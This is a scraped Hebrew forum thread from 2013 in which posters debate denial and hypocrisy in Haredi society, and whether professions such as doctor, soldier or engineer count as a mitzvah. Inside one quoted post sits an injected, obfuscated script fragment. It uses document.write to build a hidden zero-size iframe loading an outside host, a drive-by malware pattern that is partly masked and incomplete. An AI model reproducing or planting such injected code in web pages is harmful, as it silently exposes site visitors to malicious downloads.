|
|
| נשלח ב-25/4/2013 23:52 |
|
| |
| מיימוני כתב: |  | | אבל זה לא עושה אותו פושע אלא מעלים מס. |
|
טוב, מיימוני, תודה על ההסבר הארוך (בכנות). FWIW, נראה לי שפירוט סיפור המסגרת שטרחת לכתוב כאן (ואכן, תודה) הוא די מה שהבנתי מראש, כמו גם חידוד הנקודות שבהן רצית להתמקד. מאידך גיסא, הציטוט המובא לעיל הוא הדגמה לא רעה של הנקודה שאותה העליתי אני. לא נראה לי שיש לי הרבה מה להוסיף על הדברים. בהצלחה בדיון באשכול.
-------------------------------------------------------------------------------------------------------------------------------------------------
תוספת: הדברים נכתבו בתגובה להבהרתך הראשונה שמוענה אלי, לפני שראיתי את השניה. ועם זאת, גם לאחר קריאת השניה (שבהחלט מתייחסת לדברים), סבורני (אולי באופן לא מפתיע) שהניסוח שכתבת כאן מראה שיש משהו בדברי.
תוקן על ידי xibolaiyu ב- 26/04/2013 00:27:47
|
|
|
|
| נשלח ב-25/4/2013 23:54 |
|
| |
דייר
האם אנו מודים לילדינו ולעצמנו שהרופא, החייל, המהנדס, הם עושים מצוה וממלאים רצון ה' בעולם?
האם נסכים שהילד שלנו ילך לאוניברסיטה כדי להיות רופא או מהנדס, או שיתגייס כדי להיות חייל?
האם נסכים שהבת שלנו תעשה זאת (רק אוניברסיטה, לא צבא)?
אם הבן של פלוני הלך לצבא או לאוניברסיטה, כדי לקיים את המצוה של תרומה לעולם, האם נראה אותו כמי שעשה מצוה, או שנראה אותו כמי שפרש מאיתנו? איך נציג זאת לילדים? אולי: איך המשפחה שלו תציג זאת לאחיו?
יש דרך בינים, לפיה אנו עוסקים בתורה שעליה עומד העולם וכולנו נהנים מהפירות של אלו שחייבים לנו הכרת הטוב, שלא מדעת, על מה שאנו מחזיקים אותם בתורתנו. וטוב לנו שאנו עוסקים ישר ב"תכלית הבריאה" וחלילה לנו "לרדת" לרמה של אלו שתורמים לעולם דרך המדע והרפואה.
אולי לזה אתה מתכוון. ולזה אני מוכן להסכים, כלומר שכך אנו מציגים זאת לעצמנו, בעולם החרדי, לא בעצכח.
|
|
|
| נשלח ב-26/4/2013 10:12 |
|
| |
| דייר כתב: |  | אודות עולם דמיוני, בועה שבה אין מודרנה, הוא נפלא ומדוייק. זה העולם שבו אנו רוצים לחיות. אם כן עולה השאלה איך אנו מתווכים בין העולם האידיאלי הדמיוני לבין המציאות שנופלת ממנו.
והאם זו דרך תגובה טובה או שאפשר להציע אחרות?
והאם אפשר להועיל ולקדם פתרונות טובים יותר? כבוד הרב אתה רציני? אתה לא רוצה את הטוב של המודרנה? בלי תקשורת מודרנית בלי רפואה מודרנית בלי כל הישגי ההנדסה והכי חשוב בלי עצכ"ח?
|
| לא הבנתי מה הבעיה בקטע הספציפי הזה. החרדים מעונינים לשמר סוג של 'תום' וחיים מוחלטים של קבלתסמכות דתית-תורנית. ולכן מעונינים להתנתק מההוי המודרני. אבל הם לא שוללים את ה'תוצרים הטכנולוגיים' של המודרנה. זאת לא התכחשות.
|
|
|
|
| נשלח ב-26/4/2013 10:22 |
|
| |
התובנה שעולה לי בעקבות האשכול הזה זה, שאצל החרדים 'החיים הפורמאליים' חשובים מאד. אצל חרדי, גם אם הוא עובר עבירה, הוא עדיין לא מרגיש פגם גדול. כי הזהות החרדית מזהה את עצמה דרך'החרדי האידיאלי'. לכן, העיקרון, האדיאל המופשט, זה מה שחשוב. מכאן מגיעות ההתכחשויות, מתוך רצון שלא לתת הכרה ולגיטימציה 'לסטיות'. [מכירים את המשל של החפץחיים על בעל חנות מכולת שהחל לפתע למכור נעליים -אבל כל עוד לא הוריד את השלט "מכולת". הוא עדיין 'מכולת' -זה העקרון החרדי]
תוקן על ידי Zeev_w ב- 26/04/2013 10:29:02
|
|
|
|
| נשלח ב-26/4/2013 11:00 |
|
| |
| יהיאור כתב: |  | מיימוני האם ההכחשה שיש מחשב שונה מריבוי ההכחשות שהחברה החרדית אמונה עליה, שלא לאמר מתבססת עליה, ביחסי פנים ביחסי חוץ?זה לא רק שאין לנו ח"ו מחשבים או מיילים ובוודאי שלא אינטרנט חלילה (רק תמיד אני שולח דרך חבר שלי שצריך מייל במשרדו לחבר של החבר שלי..)גם אין אצלנו יצר הרע בכלל, אצלנו העיתונים הטהורים לא מדווחים על פשע, (רק מתי שזה נצרך למאמר ההשקפה להסביר כמה החילונים רעים, ואז מתברר פתאום שעורכי היתד מניחים שכל הקוראים בקיאים מאליהם במה שקורה בעולם מפשע ועד ספורט), אין גניבות, אין העלמות מיסים, אין הטרדות מיניות, רק כולם צדיקים קדושים וטהורים. גם אין אצלנו ח"ו מי שיעלה על דעתו ספקות באמונה. (אם מישהו שואל משהו, זה בוודאי האינטרנט הטמא שהכניס לו את זה בראש).בכלל, כל הטוב שיש לנו, כל הגדלות שיש אצל הגדולים שלנו, זה לא שהם פעם היו אנשים רגילים עם צרכים אנושיים, והם התמודדו או מצאו דרך להוית גדולים בתוך העולם הזה, להגביר מעט את השכל על הגרש התאווני, אלא הם כבר נולדו מלאכים. והחברה שלנו בכללה הטובה הנקייה והיפה כל כך, זה לא שאנחנו למדנו להתמודד עם הפיתויים של העולם הזה, אלא שפשוט ככה אנחנו, ואם יש איזה בעיה זה בוודאי יאיר לפיד עם החרדקים שלו שמנסים לזהם את האוויר הטהור שלנו. אנחנו האוטופיה בעצמה. הנושא לדיון: איך חברה שלמה מספרת לעצמה ולאחרים סיפורים על הטוהר שלה שלא היו ולא נבראו.הסוגיות לבחינה: הדחקה והכחשה בפסיכולוגיה קבוצתית, שקרים קדושים ושטיפת מוח חינוכית, השקפת עולם שאינה השקפה על העולם אלא השקפה שבוראת לעצמה עולם, המיתוס של טוהר הילדים והשמירה עליו, כאב-טיפוס של החברה עצמה כנקייה ביסודה.
תוקן על ידי יהיאור ב- 25/04/2013 22:50:36 |
|
יהי איך תחנך אחרת? אתה מגדל ילדים לחברה עם תביעות גבוהות, הם אמורים להיות בבית ה', לחיות בצמצום ולהקריב את עצמם למען אידיאל. אם האידיאל ומימושו אינם הכי נעלים שבעוןלם, כיצד תחנך להקירב כ"כ למענו?
 |
|
|
|
|
| נשלח ב-26/4/2013 12:08 |
|
| |
זאב על הסיפור שלך על המכולת. יש לי שניים אחרים. בחלון חנות היה שלט גדול- למכירה נעליים, אדם נכנס לחנות ובקש לקנות נעליים, אמר לו החנווני- אין לי כאן נעליים. -אז מה השלט? -אני מוכר שלטים!
מוהל תלה שלט מעל ביתו בו היה כתוב מוהל- ולידו מצויר שעון. שאלו אותו- למה ציירת שעון? - וכי מה רציתם שאצייר?
|
|
|
|
| נשלח ב-26/4/2013 13:10 |
|
| |
מיימוני כתב:
"איני יודע באיזו מידה תופעה כמו של מוישי שכיחה. אני יודע שהיא קיימת. וזה היה מגוחך אילולא זה היה עצוב - ומסוכן. מה חושבים הילדים כאשר הם יודעים שיש בבית מחשב (ואין צריך לומר: מייל או אינטרנט) וכלפי חוץ "משנים מן האמת" ואומרים שאין, למשל בטפסי ההרשמה..."
מיימוני,כרגיל,אתה חי בהכחשה.
אין דבר טבעי יותר לילד חרדי מאשר השקר וההסתרה.
הוא כבר קולט זאת בגיל הגן -אנכי עשו בכורך" כל מה שעשתה רבקה עם עורות העיזים,שמא ימושני אבי...
ועוד ועוד.
מוישי כבר יודע שאבא מתחבא במחסן וכותב מזוזות בשחור , הוא שמע מחבר קצת יותר מבוגר שישיבות מלאות בשמות של תלמידים שלא היו ולא נבראו כדי לקחת כמה שיותר מהמדינה כי זאת מצווה גדולה.
עד כמה הבן אדם יכל לחיות בהכחשה ניתן לראות מדוגמא אקטואלית. כך אומרת היום האמא של שני המחבלים מבוסטון:
"זובידאת צארנייב, אמם של האחים המחבלים מבוסטון , טענה כי הכל מבוים"
אז מיימוני,תעשה טובה לעצמך ותדע איפה אתה חי.
תוקן על ידי אפריםבן ב- 26/04/2013 13:30:49
|
|
|
|
| נשלח ב-26/4/2013 16:39 |
|
| |
| מיימוני כתב: |  | דייר
האם אנו מודים לילדינו ולעצמנו שהרופא, החייל, המהנדס, הם עושים מצוה וממלאים רצון ה' בעולם? לא יודע מה איתך אבל התשובה שלי היא כן רבתי.
האם נסכים שהילד שלנו ילך לאוניברסיטה כדי להיות רופא או מהנדס, או שיתגייס כדי להיות חייל? כנ"ל האם נסכים שהבת שלנו תעשה זאת (רק אוניברסיטה, לא צבא)? כנ"ל אם הבן של פלוני הלך לצבא או לאוניברסיטה, כדי לקיים את המצוה של תרומה לעולם, האם נראה אותו כמי שעשה מצוה, או שנראה אותו כמי שפרש מאיתנו? איך נציג זאת לילדים? אולי: איך המשפחה שלו תציג זאת לאחיו? נראה אותו כמי שעשה מצוה יש דרך בינים, לפיה אנו עוסקים בתורה שעליה עומד העולם וכולנו נהנים מהפירות של אלו שחייבים לנו הכרת הטוב, שלא מדעת, על מה שאנו מחזיקים אותם בתורתנו. וטוב לנו שאנו עוסקים ישר ב"תכלית הבריאה" וחלילה לנו "לרדת" לרמה של אלו שתורמים לעולם דרך המדע והרפואה. לדעתי זה הפוך אנחנו חייבים הכרת הטוב למי שהביא למהפכה הטכנולוגית שהיטיבה עם כולנו אולי לזה אתה מתכוון. ולזה אני מוכן להסכים, כלומר שכך אנו מציגים זאת לעצמנו, בעולם החרדי, לא בעצכח.
___בנימה אישית אין לך מה לחפש בחברה החרדית חבל לך על הזמן______________
שומר פיו ולשונו - שומר מצרות נפשו מסכים לחלוטין |
|
תוקן על ידי דייר ב- 26/04/2013 16:40:03
|
|
|
|
| נשלח ב-26/4/2013 16:54 |
|
| |
דייר ומיימוני
שאלה אגבית - באמת מצווה גדולה להיות אסטרונאוט או פיזיקאי? חוששני שזו מצווה ברמה של שלום ביתו, שזה לא ממש מצווה אלא אינטרס עצמי
|
|
|
|
| נשלח ב-26/4/2013 17:25 |
|
| |
תלמיד אני לא מבין את הטרמינולוגיה הזאת מצווה.
יש לך קו ישיר לרבש"ע לדעת מה היעוד המדויק של כל אחד בעולם?
האם אתה מתאם איתו עמדות לדעת מה מצווה ומה לא?
היהודי נמשך לפיזיקה שילמד פיזיקה אם זה מה שממלא אותו שיגשים את עצמו.
למה להכניס את כולם לאותו סד צר של לימודים תורניים?
האם זאת כוונת התורה?
אני לא מצליח להבין מהיכן צצה ההשקפה המעוותת הזאת.
אם יש רפורמים אמיתיים זה החרדים.
כזה שינוי עצום מכוונת התורה לא ראיתי מעולם.
תוקן על ידי דייר ב- 26/04/2013 17:30:10
|
|
|
|
| נשלח ב-26/4/2013 17:49 |
|
| |
שאלת אגב- איפה בתורה כתוב שיש מצווה ללמוד תורה.
אפילו ברכה מפורטת ומסודרת-כיתר המצוות-על לימוד תורה,- אין!
כי אין מצווה ללמוד תורה, יש מצווה לעסוק בתורה, כלומר שכל מעשי בן האדם ייהיו לפי התורה.
לומדים את זאת מספר יהושוע- והגית בו יומם ולילה. להגות בעברית זה לא ללמוד. זה להפעיל את המחשבה.
אגב נפסק להלכה כין אין הנביא יכול ללחדש כלום. אז איך לומדים כביכול מצווה כה "גדולה" מנביא-
תוקן על ידי ירוחםשמ ב- 26/04/2013 17:59:24
|
|
|
|
|
| נשלח ב-28/4/2013 14:26 |
|
| |
| מיימוני כתב: |  | האם אנו מודים לילדינו ולעצמנו שהרופא, החייל, המהנדס, הם עושים מצוה וממלאים רצון ה' בעולם?
האם נסכים שהילד שלנו ילך לאוניברסיטה כדי להיות רופא או מהנדס, או שיתגייס כדי להיות חייל?
האם נסכים שהבת שלנו תעשה זאת (רק אוניברסיטה, לא צבא)?
אם הבן של פלוני הלך לצבא או לאוניברסיטה, כדי לקיים את המצוה של תרומה לעולם, האם נראה אותו כמי שעשה מצוה, או שנראה אותו כמי שפרש מאיתנו? איך נציג זאת לילדים?******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
לא כל דבר הוא "מצווה", אבל יש מספיק דברים שאינן מצוות אבל הם חיוביים. חייל/רופא זה בהחלט מצווה (משא"כ מהנדס לענ"ד). כך אני גם מחנך את ילדיי.
האם אסכים שילדיי יהיו חיילים/רופאים/מהנדסים? במידה וזה לא יפגע באמונתם וקיום המצוות שלהם, בודאי שכן. הדאגה שלנו צריכה להיות כיצד נוכל לגרום שלא תהיה כל סתירה בין חייל לאורח חיים תורני מלא, וכנ"ל רופא, מהנדס וכו'.
|
|
|
|
| נשלח ב-28/4/2013 14:43 |
|
| |
תוקן על ידי ירוחםשמ ב- 28/04/2013 15:18:47
|
|
|
|
| נשלח ב-28/4/2013 14:49 |
|
| |
| חזקואמץ כתב: |  |
חייל/רופא זה בהחלט מצווה (משא"כ מהנדס לענ"ד).
|
|
תיסע בכרכרה או על חמור בדרכי עפר עם טכנולוגה מתקופת האבן.
כמובן שתוותר על כל הטכנולוגיה שבמכשור הרפואי תשכח מטיסות ודיור בבנינים מודרניים.
את המים תשתה מהבאר וחימום ובישול תשיג מהבערת עצים.
על תקשורת קווית או סלולרית או אינטרנט ומחשוב אין בכלל מה לדבר.
כי להיות מהנדס זאת לא מצווה.
פשוט לבכות.....
תוקן על ידי דייר ב- 28/04/2013 14:55:55
|
|
|
|
| נשלח ב-28/4/2013 16:39 |
|
| |
אכן, יש במחנה החרדי הרבה צביעות, או התעלמות מהמציאות המעשית לעומת איזו אוטופיה שספק אם היא אפשרית וכיף לחבוט בו. רק יש להזהר שלא ינתזו שבבים למחנה הסרוג שבו הרבה פעמים הדרשות באירועים על א"י ותורה גם לא ממש מחוברות לכל המציאות [מודה שיש הבדל במינון!]
|
|
|
|
|